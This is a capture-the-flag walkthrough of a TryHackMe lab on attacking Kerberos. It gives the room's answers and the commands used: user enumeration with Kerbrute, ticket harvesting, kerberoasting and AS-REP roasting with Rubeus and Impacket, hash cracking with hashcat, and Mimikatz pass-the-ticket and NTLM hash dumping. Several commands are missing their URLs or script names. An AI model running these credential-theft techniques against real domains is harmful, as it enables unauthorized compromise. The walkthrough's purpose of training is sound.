The Dutch Hacker
Attacking Kerberos tryhackme

Attacking Kerberos

This is the write up for the room Attacking Kerberos on Tryhackme and it is part of the CompTIA Pentest+ Path

Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment

Task Attacking Kerberos

Task 1

Start the machine then read all that is in the task. and let’s start Attacking Kerberos

1.1 What does TGT stand for?

A ticket-granting ticket is an authentication ticket used to request service tickets from the TGS for specific resources from the domain.

Answer: Ticket Granting Ticket

1.2 What does SPN stand for?

A Service Principal Name is an identifier given to a service instance to associate a service instance with a domain service account. Windows requires that services have a domain service account which is why a service needs an SPN set.

Answer: Service Principal Name

1.3 What does PAC stand for?

Privilege Attribute Certificate (PAC) – The PAC holds all of the user’s relevant information, it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.

Answer: Privilege Attribute Certificate

1.4 What two services make up the KDC?

The Key Distribution Center is a service for issuing TGTs and service tickets that consist of the Authentication Service and the Ticket Granting Service.

Answer: AS, TGS

Notice space after the ,

Task 2

As always when dealing with and active directory environment. First we add the machine name to our hosts file

nano /etc/hosts
Attacking Kerberos

Installing Kerbrute

Download the file here Releases · ropnop/kerbrute · GitHub

Open a terminal and make the file executable by typing

chmod +x filename
Attacktive Directory

You can rename the file to kerbrute for easy use. Copy the file in your /opt directory by typing in

mkdir /opt/kerbrute
cp kerbrute_linux_amd64 /opt/kerbrute/kerbrute  

Now you can always find it in your /opt directory.

Now download the user.txt file provided in this task by entering the following command


Let’s start the brute force of user account by typing in the following command

/opt/kerbrute/kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt -t 100
Attacking Kerberos

2.1 How many total users do we enumerate?

Answer: 10

2.2 What is the SQL service account name?

Answer: sqlservice

2.3 What is the second “machine” account name?

Answer: machine2

2.4 What is the third “user” account name?

Answer: user3

Task 3

ssh into the machine to complete this task

ssh administrator@<Machine_IP>
cd Downloads
Attacking Kerberos tryhackme

Now we can harvest the tickets by entering the following command

Rubeus.exe harvest /interval:30

3.1 Which domain admin do we get a ticket for when harvesting tickets?

Answer: Administrator

3.2 Which domain controller do we get a ticket for when harvesting tickets?

Attacking Kerberos tryhackme

Computer account always end with $ sign


Task 4

Remember this If the service has a registered SPN then it can be Kerberoastable

We still have the ssh session open. Type in the following

Rubeus.exe kerberoast

We now see the hashes of 2 service account. We can copy this has and crack it with hashcat. This attack means Rubeus.exe needs to be on this machine. With impacket we can do this remotely. But we need a credential to do this

Installing impacket

Install Impacket by entering the following commands

git clone /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./ install
cd /opt/impacket/examples

Now enter the command ( change ip)

sudo python3 controller.local/Machine1:Password1 -dc-ip -request

We now also see the 2 service account with their hashes

Attacking Kerberos tryhackme

Now save both hashes but in different files

Now download the password list provided in the task by entering the command


4.1 What is the HTTPService Password?

Now we have the hashes we can crack it

hashcat -m 13100 -a 0 httphash.txt Pass.txt

You can find the password in the blue area

4.2 What is the SQLService Password?

hashcat -m 13100 -a 0 sqlhash.txt Pass.txt

You can find the password in the blue area

Task 5

Shh back into the deployed machine

ssh administrator@MACHINE_IP

Task 3 has got the credentials

Once connected enter the following commands

cd Downloads
Rubeus.exe asreproast

This will spit out 2 hashes

Attacking Kerberos tryhackme

Copy those hashes into a file on you linux machine name the file after the found username followed by .txt

Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User…..

Make sure there are no spaces when saving it to a txt file

5.1 What hash type does AS-REP Roasting use?

To find this one you need to get the hascat command we are using. It has the -m 18200. Meaning it is using hash mode 18200 . We can find all hash modes in the hascat wiki page or use the man hashcat command

Answer: Kerberos 5 AS-REP etype 23

5.2 Which User is vulnerable to AS-REP Roasting?

Answer: user 3

5.3 What is the User’s Password?

Type in the following command

hashcat -m 18200 user3.txt Pass.txt
Attacking Kerberos tryhackme

5.4 What is the Admin’s Password?

Type in the following command

hashcat -m 18200 Admin2.txt Pass.txt

Task 6

Follow allong with the guide in this task

To recap

Login with ssh to the machine deployed and run the following commands

cd Downloads
sekurlsa::tickets /export

To use the has and login we can use
kerberos::ptt <ticket>

Task 7

Read all that is in the task and try to follow along

7.1 What is the SQLService NTLM Hash?

While still connecte with ssh type in the following command

lsadump::lsa /inject /name:sqlservice

7.2 What is the Administrator NTLM Hash?

While still connecte with ssh type in the following command

lsadump::lsa /inject /name:Administrator
Attacking Kerberos tryhackme

Task 8

Read all that is in the task and press complete

Task 9

Read all that is in the task and press complete

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us